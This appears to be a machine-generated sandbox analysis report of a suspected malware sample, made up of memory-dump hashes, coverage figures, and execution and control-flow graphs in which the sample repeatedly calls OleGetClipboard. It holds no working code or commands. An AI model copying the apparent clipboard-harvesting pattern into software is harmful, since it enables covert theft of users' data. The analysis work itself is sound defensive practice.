                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 07c5047e2c0bf63e4c49346ec0ac367c20303fe243217aa809b22d01131f87f2
                                                                                                                                            • Instruction ID: 08674a37ff32ab08e00f0084f0c348fcc8c7d44d6bca0c4fc74ce81a84f832f1
                                                                                                                                            • Opcode Fuzzy Hash: 07c5047e2c0bf63e4c49346ec0ac367c20303fe243217aa809b22d01131f87f2
                                                                                                                                            • Instruction Fuzzy Hash: B1F0156410E3C0AFC7032BB4497A5547FB1AE9314430E05D7E18ACF5B3DA198818C72B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2f81ab2eb30b1bac3b21cacfef52bdd30de7477774b0b0a2cebedae07cb552e8
                                                                                                                                            • Instruction ID: 7f984da3cf19874a06b08bd7cb8c052c970e37373c4d2496bbf1d5835391c11f
                                                                                                                                            • Opcode Fuzzy Hash: 2f81ab2eb30b1bac3b21cacfef52bdd30de7477774b0b0a2cebedae07cb552e8
                                                                                                                                            • Instruction Fuzzy Hash: 29E0DFA1300106A7CB20564FA544B7BFAFEFBC8721F008C26F81DC3204CA60D80992A6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 04b98807cc030c1b93a526e12a795c447d72a0bdd85bf6c7b22aa8b69727ac87
                                                                                                                                            • Instruction ID: 64955f98b9317197365e83cf37feb34a21fce653f88aae5f51233d2ea591aef8
                                                                                                                                            • Opcode Fuzzy Hash: 04b98807cc030c1b93a526e12a795c447d72a0bdd85bf6c7b22aa8b69727ac87
                                                                                                                                            • Instruction Fuzzy Hash: 8DE04F72B002146B9B08DAAE8C448AFBAEEDB84190B11C579E909E3244FD319D0187D4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c1fe6006fb00f1b6b02c4b790ac31a3909257292a8babde13e2a64df8d40f5af
                                                                                                                                            • Instruction ID: 9ace771487be18fceb415fc58022a47daf2d72d786eb3efc86b0f46d2bd1999d
                                                                                                                                            • Opcode Fuzzy Hash: c1fe6006fb00f1b6b02c4b790ac31a3909257292a8babde13e2a64df8d40f5af
                                                                                                                                            • Instruction Fuzzy Hash: 18D05EB774405007DF09946EE8A37FC2BC2CBD12EAF0C4867E906CA295E01E8685B70D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f9793864dc8dcde65c3ca27c1186df8a3c850d00d9821b70080784153ef0e585
                                                                                                                                            • Instruction ID: 9b48684a6bc516bfd2fa077e207690d2369d36fc4531aa252c007b6564c8d51b
                                                                                                                                            • Opcode Fuzzy Hash: f9793864dc8dcde65c3ca27c1186df8a3c850d00d9821b70080784153ef0e585
                                                                                                                                            • Instruction Fuzzy Hash: ADE0DF72A4022DEACB149B84E5047FDBF70FB45396F200822E442B1480C7310584EB95
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 251cc6b24db82a2e9860a40ccad423c15ac4396f13f84de99d6a1cb3e99b26f2
                                                                                                                                            • Instruction ID: 6e4b221899b8d82c177d5b2ce867c360c9f649e00a9f4562e11add6274f21018
                                                                                                                                            • Opcode Fuzzy Hash: 251cc6b24db82a2e9860a40ccad423c15ac4396f13f84de99d6a1cb3e99b26f2
                                                                                                                                            • Instruction Fuzzy Hash: E2E08C313047085FC728CA1CE880B96F7E9EF88214B2846ADF90AC7B61DB60EC058B84
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 16992307b5854f5a6e84054b4712e362d49596c4bb18f58c48798630b7c0b189
                                                                                                                                            • Instruction ID: a2c30a741b314c82e7743fa3129130efd988178e18dcce113c1fc5acd5f01e57
                                                                                                                                            • Opcode Fuzzy Hash: 16992307b5854f5a6e84054b4712e362d49596c4bb18f58c48798630b7c0b189
                                                                                                                                            • Instruction Fuzzy Hash: 24E06D36D1828DEFCB21CBA4D8054DDBF75EB02224F1443DAE825972D1EB316A06DB80
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: fc0fa3bbf9f475d2ff7113f7f94d48e260f6743827afcae72d4d68f4690c4bbe
                                                                                                                                            • Instruction ID: 5eb443e79b43c81bad27c45592421f175b833dc829d0cba5165e11325fb005c8
                                                                                                                                            • Opcode Fuzzy Hash: fc0fa3bbf9f475d2ff7113f7f94d48e260f6743827afcae72d4d68f4690c4bbe
                                                                                                                                            • Instruction Fuzzy Hash: 3FE07E75D0420CEFCB50DFA4D9458EDBBB9EB48200F1082AAA809E2210EA306B559B80
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 26fbfed991bfb6c6df24becf097e3e87d7cca9a2111bf3fb7e3f15d203b7fc04
                                                                                                                                            • Instruction ID: 1cbbaad033c8eaaa74a37ccbfe4660dd4c17d3444f3d9ae7a6dffffdf4b47120
                                                                                                                                            • Opcode Fuzzy Hash: 26fbfed991bfb6c6df24becf097e3e87d7cca9a2111bf3fb7e3f15d203b7fc04
                                                                                                                                            • Instruction Fuzzy Hash: A7D017303146149F8728DA1CE84085AB3EAAF8822032586A9F00AC7760DA60EC054A84
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a7884610e6f0a464f3670e73be6bd1dc246181cfda28448017b8421a447ab97b
                                                                                                                                            • Instruction ID: 60107ea411baf098802d0e992eab86d9cad25b7372d2dac0e1dee4250af070ed
                                                                                                                                            • Opcode Fuzzy Hash: a7884610e6f0a464f3670e73be6bd1dc246181cfda28448017b8421a447ab97b
                                                                                                                                            • Instruction Fuzzy Hash: A4E0BFB0905209EFCB41EFE4E54145DBBB5FB85214B108575EC05A7314EB3A6F14AB51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2d408544b229b6e46872eab41abc40f5b19b686da6c5a44b3924e4e844298858
                                                                                                                                            • Instruction ID: fb08f8f630b7d989bb5c901a04f9849972e12f515698f149898ada8f33931406
                                                                                                                                            • Opcode Fuzzy Hash: 2d408544b229b6e46872eab41abc40f5b19b686da6c5a44b3924e4e844298858
                                                                                                                                            • Instruction Fuzzy Hash: 10D0A79960A2910AEB0952A411105E92B654B42385F0400A7C508CB181D915484143AF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 91f000e802442919015e07e434b31fe51a623389f2bb796d63f84211b64468f1
                                                                                                                                            • Instruction ID: b023ad7200e06c6a864644e2cb38ddfe655eb872724b4f7c6d3d39fb818ee596
                                                                                                                                            • Opcode Fuzzy Hash: 91f000e802442919015e07e434b31fe51a623389f2bb796d63f84211b64468f1
                                                                                                                                            • Instruction Fuzzy Hash: 61B09B2231413913DF0871DD64149FD728E47C5665F000077950D877414CC5DC5103DE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 0bbd9f4a9c9810263aeb5ccfa5fa502aac131976b2d5ba46d0d63c2c2fe92ba5
                                                                                                                                            • Instruction ID: 7de142482b9c8baed3a64ab175a97df3c9f036f6127e5440e667627ffe2871bc
                                                                                                                                            • Opcode Fuzzy Hash: 0bbd9f4a9c9810263aeb5ccfa5fa502aac131976b2d5ba46d0d63c2c2fe92ba5
                                                                                                                                            • Instruction Fuzzy Hash: 0BD01237390208BFD741AED4D841E96775DEB48610F909110FA084A201C672E852D764
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 247d816ea775c554fe601e0815c799195ddcab590a7cf6e49d29910b4de56b63
                                                                                                                                            • Instruction ID: 139078ede7cbbb2bc401b624d36300ad4bdc98b17d59b21fd48fe041325ec0c7
                                                                                                                                            • Opcode Fuzzy Hash: 247d816ea775c554fe601e0815c799195ddcab590a7cf6e49d29910b4de56b63
                                                                                                                                            • Instruction Fuzzy Hash: BFC01236290208AFD741AAD4D840D55775DAB08610F509000FA080A101C572E8529754
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: fab490987c13939311f6b3a9758410310b836220f0b8b556dcecb80e3cb92620
                                                                                                                                            • Instruction ID: d8ab872cdc8f5da14728eb01243badb83174525fa7ea4d4eab331f4541fa6c3e
                                                                                                                                            • Opcode Fuzzy Hash: fab490987c13939311f6b3a9758410310b836220f0b8b556dcecb80e3cb92620
                                                                                                                                            • Instruction Fuzzy Hash: 3AA012301242088B8D002FB4600E02DBB8C45C110878000227A0D42B409C2B74004041

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:15.3%
                                                                                                                                            Dynamic/Decrypted Code Coverage:88.1%
                                                                                                                                            Signature Coverage:0%
                                                                                                                                            Total number of Nodes:59
                                                                                                                                            Total number of Limit Nodes:10
                                                                                                                                            execution_graph 16452 7550e30 16453 7550e55 16452->16453 16454 7550e4c 16452->16454 16457 174d010 16454->16457 16461 174d01f 16454->16461 16460 174d01f 16457->16460 16458 174d066 16458->16453 16460->16458 16465 7550fff 16460->16465 16462 174d048 16461->16462 16463 174d066 16462->16463 16464 7550fff OleGetClipboard 16462->16464 16463->16453 16464->16462 16469 7551430 16465->16469 16475 755142f 16465->16475 16466 7551006 16466->16460 16471 7551438 16469->16471 16470 755144c 16470->16466 16471->16470 16481 7551469 16471->16481 16492 7551478 16471->16492 16472 7551461 16472->16466 16476 7551430 16475->16476 16477 755144c 16476->16477 16479 7551469 OleGetClipboard 16476->16479 16480 7551478 OleGetClipboard 16476->16480 16477->16466 16478 7551461 16478->16466 16479->16478 16480->16478 16482 755148a 16481->16482 16483 75514a5 16482->16483 16484 75514e9 16482->16484 16488 7551469 OleGetClipboard 16483->16488 16489 7551478 OleGetClipboard 16483->16489 16486 7551569 16484->16486 16503 7551650 16484->16503 16507 755164f 16484->16507 16485 7551587 16485->16472 16486->16472 16487 75514ab 16487->16472 16488->16487 16489->16487 16493 755148a 16492->16493 16494 75514a5 16493->16494 16496 75514e9 16493->16496 16499 7551469 OleGetClipboard 16494->16499 16500 7551478 OleGetClipboard 16494->16500 16495 75514ab 16495->16472 16498 7551569 16496->16498 16501 7551650 OleGetClipboard 16496->16501 16502 755164f OleGetClipboard 16496->16502 16497 7551587 16497->16472 16498->16472 16499->16495 16500->16495 16501->16497 16502->16497 16505 7551665 16503->16505 16506 755168b 16505->16506 16511 755124c 16505->16511 16506->16485 16509 7551650 16507->16509 16508 755124c OleGetClipboard 16508->16509 16509->16508 16510 755168b 16509->16510 16510->16485 16512 75516f8 OleGetClipboard 16511->16512 16514 7551792 16512->16514 16515 75500f9 16516 7550129 16515->16516 16517 75501b4 16516->16517 16520 7550da1 DispatchMessageW 16516->16520 16522 7550da8 DispatchMessageW 16516->16522 16521 7550e14 16520->16521 16521->16516 16523 7550e14 16522->16523 16523->16516

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 154 3057118-305713b 155 3057146-3057166 154->155 156 305713d-3057143 154->156 159 305716d-3057174 155->159 160 3057168 155->160 156->155 162 3057176-3057181 159->162 161 30574fc-3057505 160->161 163 3057187-305719a 162->163 164 305750d-3057521 162->164 167 30571b0-30571cb 163->167 168 305719c-30571aa 163->168 170 3057523-3057527 164->170 171 3057528-305752a 164->171 179 30571cd-30571d3 167->179 180 30571ef-30571f2 167->180 168->167 176 3057484-305748b 168->176 170->171 173 3057531-3057532 171->173 174 305752c-3057530 171->174 177 3057534-3057536 173->177 178 3057539-3057549 173->178 174->173 176->161 183 305748d-305748f 176->183 199 3057552-3057556 178->199 200 305754b-3057550 178->200 181 30571d5 179->181 182 30571dc-30571df 179->182 184 305734c-3057352 180->184 185 30571f8-30571fb 180->185 181->182 181->184 188 3057212-3057218 181->188 189 305743e-3057441 181->189 182->188 190 30571e1-30571e4 182->190 191 3057491-3057496 183->191 192 305749e-30574a4 183->192 184->189 193 3057358-305735d 184->193 185->184 186 3057201-3057207 185->186 186->184 194 305720d 186->194 195 305721e-3057220 188->195 196 305721a-305721c 188->196 197 3057447-305744d 189->197 198 3057508 189->198 201 305727e-3057284 190->201 202 30571ea 190->202 191->192 192->164 203 30574a6-30574ab 192->203 193->189 194->189 207 305722a-3057233 195->207 196->207 208 3057472-3057476 197->208 209 305744f-3057457 197->209 198->164 210 305755c-305755d 199->210 200->210 201->189 206 305728a-3057290 201->206 202->189 204 30574f0-30574f3 203->204 205 30574ad-30574b2 203->205 204->198 218 30574f5-30574fa 204->218 205->198 211 30574b4 205->211 212 3057296-3057298 206->212 213 3057292-3057294 206->213 215 3057235-3057240 207->215 216 3057246-305726e 207->216 208->176 217 3057478-305747e 208->217 209->164 214 305745d-305746c 209->214 219 30574bb-30574c0 211->219 220 30572a2-30572b9 212->220 213->220 214->167 214->208 215->189 215->216 238 3057274-3057279 216->238 239 3057362-3057398 216->239 217->162 217->176 218->161 218->183 221 30574e2-30574e4 219->221 222 30574c2-30574c4 219->222 231 30572e4-305730b 220->231 232 30572bb-30572d4 220->232 221->198 229 30574e6-30574e9 221->229 226 30574c6-30574cb 222->226 227 30574d3-30574d9 222->227 226->227 227->164 230 30574db-30574e0 227->230 229->204 230->221 234 30574b6-30574b9 230->234 231->198 243 3057311-3057314 231->243 232->239 244 30572da-30572df 232->244 234->198 234->219 238->239 245 30573a5-30573ad 239->245 246 305739a-305739e 239->246 243->198 247 305731a-3057343 243->247 244->239 245->198 250 30573b3-30573b8 245->250 248 30573a0-30573a3 246->248 249 30573bd-30573c1 246->249 247->239 262 3057345-305734a 247->262 248->245 248->249 251 30573e0-30573e4 249->251 252 30573c3-30573c9 249->252 250->189 255 30573e6-30573ec 251->255 256 30573ee-305740d call 30576f1 251->256 252->251 254 30573cb-30573d3 252->254 254->198 257 30573d9-30573de 254->257 255->256 259 3057413-3057417 255->259 256->259 257->189 259->189 260 3057419-3057435 259->260 260->189 262->239
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (o^q$(o^q$,bq$,bq
                                                                                                                                            • API String ID: 0-879173519
                                                                                                                                            • Opcode ID: 4a53e26a4bcbb8dc82f0414f0fd6abe5646dba58fb5b3a15a415df241605276c
                                                                                                                                            • Instruction ID: 3ad27c41602ce55ce95eacf78b4e285faa77573dff8fe31c74ab36186b1adef7
                                                                                                                                            • Opcode Fuzzy Hash: 4a53e26a4bcbb8dc82f0414f0fd6abe5646dba58fb5b3a15a415df241605276c
                                                                                                                                            • Instruction Fuzzy Hash: 78E12A30A02119DFCB54CFA9C884AAEBBF6BF88B11F598465F845AB365D730E841DF50
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (o^q$4'^q
                                                                                                                                            • API String ID: 0-273632683
                                                                                                                                            • Opcode ID: 1d070f5133e6f8c244abc0fb0535d862d2d34cd3ad2cabdbe9ae24927efe932c
                                                                                                                                            • Instruction ID: 651907676bf3e4d389a2476fa6eacc0ac0a5794e6cd2e4e498633129e77f0910
                                                                                                                                            • Opcode Fuzzy Hash: 1d070f5133e6f8c244abc0fb0535d862d2d34cd3ad2cabdbe9ae24927efe932c
                                                                                                                                            • Instruction Fuzzy Hash: F5824C35B01249DFCB16CFA8C584AAFBBF6FF88310F158695E8059B265D730E991CB60

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 530 30569a0-30569a2 531 30569a4-30569a6 530->531 532 30569a9-30569aa 530->532 533 30569ad 531->533 534 30569a8 531->534 535 30569b1-30569e6 532->535 536 30569ac 532->536 533->535 534->532 537 3056fb1-3056fba 535->537 538 30569ec-30569fa 535->538 536->533 543 3056fc1 537->543 544 3056fbc-3056fc0 537->544 541 30569fc-3056a0d 538->541 542 3056a28-3056a39 538->542 541->542 552 3056a0f-3056a1b 541->552 545 3056a3b-3056a3f 542->545 546 3056aaa-3056abe 542->546 547 3056fc4 543->547 548 3056fc9-305700c call 3057118 543->548 544->543 550 3056a41-3056a4d 545->550 551 3056a5a-3056a63 545->551 682 3056ac1 call 30569a0 546->682 683 3056ac1 call 3056fc8 546->683 547->548 565 305705c-3057060 548->565 566 305700e-3057012 548->566 554 3056a53-3056a55 550->554 555 3056ddb-3056e26 550->555 556 3056d6c 551->556 557 3056a69-3056a6c 551->557 559 3056d71-3056dd4 552->559 560 3056a21-3056a23 552->560 553 3056ac7-3056acd 561 3056ad6-3056add 553->561 562 3056acf-3056ad1 553->562 563 3056d62-3056d69 554->563 636 3056e2d-3056eac 555->636 556->559 557->556 564 3056a72-3056a91 557->564 559->555 560->563 569 3056ae3-3056afa 561->569 570 3056bcb-3056bdc 561->570 562->563 564->556 597 3056a97-3056a9d 564->597 567 3057077-305708b 565->567 568 3057062-3057071 565->568 572 3057014-3057019 566->572 573 3057021-3057028 566->573 578 3057093-305709a 567->578 685 305708d call 3059dd0 567->685 686 305708d call 305a088 567->686 687 305708d call 305a0e8 567->687 576 3057073-3057075 568->576 577 305709d-30570a7 568->577 569->570 591 3056b00-3056b0c 569->591 587 3056c06-3056c0c 570->587 588 3056bde-3056beb 570->588 572->573 574 30570fe-3057113 573->574 575 305702e-3057035 573->575 575->565 581 3057037-305703b 575->581 576->578 583 30570b1-30570b5 577->583 584 30570a9-30570af 577->584 589 305703d-3057042 581->589 590 305704a-3057051 581->590 593 30570bd-30570f7 583->593 595 30570b7 583->595 584->593 599 3056c27-3056c2d 587->599 600 3056c0e-3056c1a 587->600 588->599 612 3056bed-3056bf9 588->612 589->590 590->574 601 3057057-305705a 590->601 602 3056bc4-3056bc6 591->602 603 3056b12-3056b7e 591->603 593->574 595->593 597->537 605 3056aa3-3056aa7 597->605 609 3056c33-3056c50 599->609 610 3056d5f 599->610 607 3056c20-3056c22 600->607 608 3056ec3-3056f26 600->608 601->578 602->563 638 3056b80-3056baa 603->638 639 3056bac-3056bc1 603->639 605->546 607->563 662 3056f2d-3056fac 608->662 609->556 630 3056c56-3056c59 609->630 610->563 618 3056eb1-3056ebc 612->618 619 3056bff-3056c01 612->619 618->608 619->563 630->537 634 3056c5f-3056c85 630->634 634->610 643 3056c8b-3056c97 634->643 638->639 639->602 646 3056c9d-3056d15 643->646 647 3056d5b-3056d5d 643->647 665 3056d17-3056d41 646->665 666 3056d43-3056d58 646->666 647->563 665->666 666->647 682->553 683->553 685->578 686->578 687->578
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (o^q$Hbq
                                                                                                                                            • API String ID: 0-662517225
                                                                                                                                            • Opcode ID: 383cda8e2b2110c6c85eb547afa1a5991afe89cccfc6189cb1e8300d64aa53ac
                                                                                                                                            • Instruction ID: 45f67956fea6be6262c96872e9a86b74c165ee41be666dd47473311191c1d053
                                                                                                                                            • Opcode Fuzzy Hash: 383cda8e2b2110c6c85eb547afa1a5991afe89cccfc6189cb1e8300d64aa53ac
                                                                                                                                            • Instruction Fuzzy Hash: EB127D70A002199FDB18DF69C854AAEBBF6FF88300F548569E909EB395DF319D41CB90

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 864 305c146-305c158 865 305c184 864->865 866 305c15a-305c172 864->866 867 305c186-305c18a 865->867 870 305c174-305c179 866->870 871 305c17b-305c17e 866->871 870->867 872 305c180-305c182 871->872 873 305c18b-305c199 871->873 872->865 872->866 875 305c212-305c219 873->875 876 305c19b-305c1a1 873->876 878 305c21a-305c2ac call 30541a0 call 3053cc0 875->878 877 305c1a3-305c1c8 876->877 876->878 879 305c1cf-305c20a 877->879 880 305c1ca 877->880 890 305c2b3-305c2d4 call 3055658 878->890 891 305c2ae 878->891 879->875 880->879 893 305c2d9-305c2e4 890->893 891->890 894 305c2e6 893->894 895 305c2eb-305c2ef 893->895 894->895 896 305c2f4-305c2fb 895->896 897 305c2f1-305c2f2 895->897 898 305c302-305c310 896->898 899 305c2fd 896->899 900 305c313-305c357 897->900 898->900 899->898 904 305c3bd-305c3d4 900->904 906 305c3d6-305c3fb 904->906 907 305c359-305c36f 904->907 914 305c413 906->914 915 305c3fd-305c412 906->915 911 305c371-305c37d 907->911 912 305c399 907->912 916 305c387-305c38d 911->916 917 305c37f-305c385 911->917 913 305c39f-305c3bc 912->913 913->904 915->914 918 305c397 916->918 917->918 918->913
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: PH^q$PH^q
                                                                                                                                            • API String ID: 0-1598597984
                                                                                                                                            • Opcode ID: 1ff414731545780763fd8007342226e60e59ce3ba821ba288ac3f8f8452d38fa
                                                                                                                                            • Instruction ID: 9f1b7d44065c155c7179b2b3bcb0812a47b886ed862588f4d02e578efbea78e6
                                                                                                                                            • Opcode Fuzzy Hash: 1ff414731545780763fd8007342226e60e59ce3ba821ba288ac3f8f8452d38fa
                                                                                                                                            • Instruction Fuzzy Hash: CEA1DB74E01218DFEB54DFAAD984A9DBBF2FF89310F148069E819AB365DB309841CF54

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 922 305d278-305d27a 923 305d281-305d284 922->923 924 305d27c-305d280 922->924 925 305d286 923->925 926 305d2dd-305d38c call 30541a0 call 3053cc0 923->926 924->923 927 305d289-305d2a8 925->927 928 305d288 925->928 940 305d393-305d3b4 call 3055658 926->940 941 305d38e 926->941 930 305d2af-305d2dc 927->930 931 305d2aa 927->931 928->927 930->926 931->930 943 305d3b9-305d3c4 940->943 941->940 944 305d3c6 943->944 945 305d3cb-305d3cf 943->945 944->945 946 305d3d4-305d3db 945->946 947 305d3d1-305d3d2 945->947 949 305d3e2-305d3f0 946->949 950 305d3dd 946->950 948 305d3f3-305d437 947->948 954 305d49d-305d4b4 948->954 949->948 950->949 956 305d4b6-305d4db 954->956 957 305d439-305d44f 954->957 963 305d4f3 956->963 964 305d4dd-305d4f2 956->964 961 305d451-305d45d 957->961 962 305d479 957->962 965 305d467-305d46d 961->965 966 305d45f-305d465 961->966 967 305d47f-305d49c 962->967 964->963 968 305d477 965->968 966->968 967->954 968->967
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: PH^q$PH^q
